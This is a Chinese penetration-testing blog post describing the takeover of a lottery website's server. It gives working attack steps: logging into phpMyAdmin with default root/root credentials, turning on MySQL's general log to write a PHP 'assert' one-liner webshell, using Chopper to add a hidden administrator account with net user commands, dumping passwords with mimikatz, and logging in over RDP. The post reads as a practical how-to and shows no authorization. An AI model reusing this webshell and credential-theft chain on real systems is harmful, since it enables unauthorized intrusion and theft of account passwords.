涉及知识点:
phpmyadmin后台写马getshll
mimikatz使用,抓密码
开启3389端口远程连接
获取旁站
By;梭哈王
获取phpmyadmin弱口令
通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。
通过phpmyadmin后台sql查询写入shell到日志文件
使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。
流程如下:
命令如下:
1、开启日志功能:set global general_log=on;
2、点击phpmyadmin变量查看日志文件名字:
这里的日志文件是test.php。
3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';
4、执行成功返回。
5、查看日志文件。
6、菜刀连接添加用户并且上传mimikatz。
使用菜刀连接日志文件木马,xxx/test.php 密码:test
查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。
命令为: C:Windowssystem32net.exe user Test Test!@#123 /add
C:Windowssystem32net.exe localgroup administrators Test /add
上传mimikataz到服务器当中。
7、3389连接,读取管理员密码。
(1)、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。
(2)、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。
第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程
第二步: netstat -ano | findstr **** //查看远程桌面服务进程号对应的端口号。
(3)、执行mimikatz,读取到管理员组登录密码。
(4)、使用获取的administrator/xxxx账户密码远程登入服务器当中。
发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:
系统一:
系统二:
系统三:
后台一:
后台二:
————————————————
作者:安全小哥
引用原文:https://blog.csdn.net/weixin_39997829/article/details/109186917
推荐阅读:
▶【渗透实战系列】18-手动拿学校站点 得到上万人的信息(漏洞已提交)
▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell
▶【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点
▶【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局
▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)
▶【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试(非常详细,适合打战练手)
▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)
▶【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)
▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)
点分享
点收藏
点点赞
点在看
本文始发于微信公众号(Hacking黑白红):【渗透实战系列】22|-渗透系列之打击彩票站
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论